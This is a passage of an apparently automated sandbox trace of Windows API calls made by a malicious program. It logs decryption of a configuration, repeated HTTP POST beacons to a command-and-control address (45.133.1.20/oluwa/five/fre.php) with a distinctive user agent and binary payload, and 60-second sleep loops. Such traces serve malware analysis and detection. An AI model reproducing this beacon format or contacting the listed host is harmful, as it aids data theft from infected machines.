| out: hHeap=0x6a0000) returned 1 [0205.392] GetProcessHeap () returned 0x6a0000 [0205.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0205.392] GetProcessHeap () returned 0x6a0000 [0205.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0205.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8f8) returned 0x570 [0205.395] Sleep (dwMilliseconds=0xea60) [0205.397] GetProcessHeap () returned 0x6a0000 [0205.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0205.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.398] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.406] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0205.416] GetProcessHeap () returned 0x6a0000 [0205.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b69f8 [0205.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.417] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b69f8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0205.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.419] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.420] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.420] GetProcessHeap () returned 0x6a0000 [0205.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b69f8 | out: hHeap=0x6a0000) returned 1 [0205.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.424] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0205.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.429] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0205.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.431] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0205.431] GetProcessHeap () returned 0x6a0000 [0205.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0205.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.432] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.433] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.434] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.435] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.435] GetProcessHeap () returned 0x6a0000 [0205.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0205.435] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.435] GetProcessHeap () returned 0x6a0000 [0205.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0205.436] GetProcessHeap () returned 0x6a0000 [0205.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0205.436] GetProcessHeap () returned 0x6a0000 [0205.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0205.437] GetProcessHeap () returned 0x6a0000 [0205.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0205.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.444] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0205.452] GetProcessHeap () returned 0x6a0000 [0205.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0205.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.453] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0205.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.455] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.456] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.456] GetProcessHeap () returned 0x6a0000 [0205.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0205.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.458] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0205.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.460] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0205.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.462] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0205.462] GetProcessHeap () returned 0x6a0000 [0205.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0205.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.463] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0205.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.464] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0205.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.465] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0205.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.467] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0205.467] GetProcessHeap () returned 0x6a0000 [0205.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0205.467] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0205.467] GetProcessHeap () returned 0x6a0000 [0205.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0205.467] socket (af=2, type=1, protocol=6) returned 0x574 [0205.467] connect (s=0x574, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0205.492] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0205.492] GetProcessHeap () returned 0x6a0000 [0205.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0205.492] GetProcessHeap () returned 0x6a0000 [0205.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0205.493] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0205.494] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0205.494] GetProcessHeap () returned 0x6a0000 [0205.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0205.494] GetProcessHeap () returned 0x6a0000 [0205.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0205.495] GetProcessHeap () returned 0x6a0000 [0205.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0205.495] GetProcessHeap () returned 0x6a0000 [0205.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0205.496] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0205.497] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0205.497] GetProcessHeap () returned 0x6a0000 [0205.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0205.497] GetProcessHeap () returned 0x6a0000 [0205.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0205.498] send (s=0x574, buf=0x6b5c98*, len=242, flags=0) returned 242 [0205.499] send (s=0x574, buf=0x6bb998*, len=159, flags=0) returned 159 [0205.500] GetProcessHeap () returned 0x6a0000 [0205.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0205.500] recv (in: s=0x574, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0205.582] GetProcessHeap () returned 0x6a0000 [0205.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0205.584] GetProcessHeap () returned 0x6a0000 [0205.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0205.584] GetProcessHeap () returned 0x6a0000 [0205.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0205.585] GetProcessHeap () returned 0x6a0000 [0205.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0205.586] closesocket (s=0x574) returned 0 [0205.588] GetProcessHeap () returned 0x6a0000 [0205.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0205.588] GetProcessHeap () returned 0x6a0000 [0205.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0205.589] GetProcessHeap () returned 0x6a0000 [0205.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0205.589] GetProcessHeap () returned 0x6a0000 [0205.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0205.590] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x130c) returned 0x574 [0205.592] Sleep (dwMilliseconds=0xea60) [0205.593] GetProcessHeap () returned 0x6a0000 [0205.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0205.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.595] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.603] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0205.613] GetProcessHeap () returned 0x6a0000 [0205.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5da8 [0205.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.614] CryptImportKey (in: hProv=0x6beca0, pbData=0x6c5da8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0205.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.616] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.618] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.618] GetProcessHeap () returned 0x6a0000 [0205.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5da8 | out: hHeap=0x6a0000) returned 1 [0205.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.623] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0205.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.629] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0205.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.631] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0205.631] GetProcessHeap () returned 0x6a0000 [0205.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0205.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.633] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.634] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.635] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.636] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.636] GetProcessHeap () returned 0x6a0000 [0205.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0205.636] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.637] GetProcessHeap () returned 0x6a0000 [0205.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0205.637] GetProcessHeap () returned 0x6a0000 [0205.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0205.637] GetProcessHeap () returned 0x6a0000 [0205.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0205.638] GetProcessHeap () returned 0x6a0000 [0205.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0205.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.639] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.646] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0205.653] GetProcessHeap () returned 0x6a0000 [0205.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0205.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.655] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0205.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.656] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.657] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.657] GetProcessHeap () returned 0x6a0000 [0205.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0205.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.661] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0205.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.662] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0205.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.663] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0205.663] GetProcessHeap () returned 0x6a0000 [0205.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0205.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.665] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0205.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.666] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0205.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.667] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0205.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.668] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0205.668] GetProcessHeap () returned 0x6a0000 [0205.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0205.668] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0205.668] GetProcessHeap () returned 0x6a0000 [0205.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0205.668] socket (af=2, type=1, protocol=6) returned 0x578 [0205.669] connect (s=0x578, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0205.693] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0205.693] GetProcessHeap () returned 0x6a0000 [0205.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0205.693] GetProcessHeap () returned 0x6a0000 [0205.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0205.694] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0205.695] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0205.696] GetProcessHeap () returned 0x6a0000 [0205.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0205.696] GetProcessHeap () returned 0x6a0000 [0205.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0205.696] GetProcessHeap () returned 0x6a0000 [0205.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0205.696] GetProcessHeap () returned 0x6a0000 [0205.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0205.697] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0205.698] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0205.698] GetProcessHeap () returned 0x6a0000 [0205.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0205.698] GetProcessHeap () returned 0x6a0000 [0205.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0205.699] send (s=0x578, buf=0x6b5c98*, len=242, flags=0) returned 242 [0205.699] send (s=0x578, buf=0x6bb998*, len=159, flags=0) returned 159 [0205.699] GetProcessHeap () returned 0x6a0000 [0205.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0205.699] recv (in: s=0x578, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0205.772] GetProcessHeap () returned 0x6a0000 [0205.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0205.772] GetProcessHeap () returned 0x6a0000 [0205.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0205.773] GetProcessHeap () returned 0x6a0000 [0205.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0205.774] GetProcessHeap () returned 0x6a0000 [0205.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0205.775] closesocket (s=0x578) returned 0 [0205.775] GetProcessHeap () returned 0x6a0000 [0205.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0205.776] GetProcessHeap () returned 0x6a0000 [0205.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0205.776] GetProcessHeap () returned 0x6a0000 [0205.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0205.777] GetProcessHeap () returned 0x6a0000 [0205.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0205.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8f4) returned 0x578 [0205.779] Sleep (dwMilliseconds=0xea60) [0205.780] GetProcessHeap () returned 0x6a0000 [0205.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0205.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.781] CryptAcquireContextW (in: 